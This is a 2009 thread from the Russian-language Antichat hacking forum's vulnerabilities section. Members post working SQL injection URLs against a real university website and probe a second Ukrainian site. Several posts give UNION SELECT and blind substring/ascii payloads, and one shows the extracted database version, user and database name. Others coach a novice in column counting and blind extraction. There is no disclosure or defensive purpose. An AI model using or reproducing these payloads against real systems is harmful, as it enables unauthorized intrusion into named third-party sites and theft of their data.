HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.02.2009, 02:04
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Код:
www.christuniversity.in/secmenudisp.php?MID=37+group+by+1+--
Один столбец
 
Ответить с цитированием

  #2  
Старый 14.02.2009, 02:06
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

ой .... не пинайте
 
Ответить с цитированием

  #3  
Старый 14.02.2009, 02:11
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

А почему при простом запросе union+select+1+-- пишеть што : The used SELECT statements have a different number of columns когда я точно узнал што чеголиш 1 столбец

Последний раз редактировалось Saiga; 14.02.2009 в 02:24..
 
Ответить с цитированием

  #4  
Старый 14.02.2009, 02:29
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

видемо мне ....

2 pinky07 незнаю как далше .
 
Ответить с цитированием

  #5  
Старый 14.02.2009, 02:33
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
По умолчанию

Saiga, заканчивай флудить и кидай ссылку.

p.s. терпения не хватило подобрать количество столбцов, в таких случаях можно использовать подзапросы
Цитата:
http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4
версия Mysql =4
юзер бд:
Цитата:
http://www.christuniversity.in/secmenudisp.php?MID=7+and+ascii(substring(user(),1 ,1))=99 -- c
итд....

// прочитай побольше статей

Последний раз редактировалось pinky07; 14.02.2009 в 03:02..
 
Ответить с цитированием

  #6  
Старый 14.02.2009, 02:39
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

hh~tp://www.christuniversity.in/secmenudisp.php?MID=7
 
Ответить с цитированием

  #7  
Старый 14.02.2009, 02:55
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

Цитата:
http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4
ИТД...
 
Ответить с цитированием

  #8  
Старый 14.02.2009, 09:29
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

pinky07, зачем усложнять жизнь подзапросами??? это крайняя мера, так как долго и нудно! Этот сайт вообще одна большая скуль =))) каждый параметр и стоило еще чуть посмотреть и вот он
Код:
http://www.christuniversity.in/display_article.php?fid=20&arid=13+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/*
4.1.22
christco_christ@localhost
christ_university

Последний раз редактировалось Kraneg; 14.02.2009 в 09:40..
 
Ответить с цитированием

  #9  
Старый 14.02.2009, 12:34
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
 
Ответить с цитированием

  #10  
Старый 14.02.2009, 12:37
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от BanQui  
Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
Код:
SELECT post_id,title,date FROM eA_cp.mainnews ORDER by date DESC LIMIT -5,5
Инъекция в limit после order by.
ничего не сделаешь тут.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.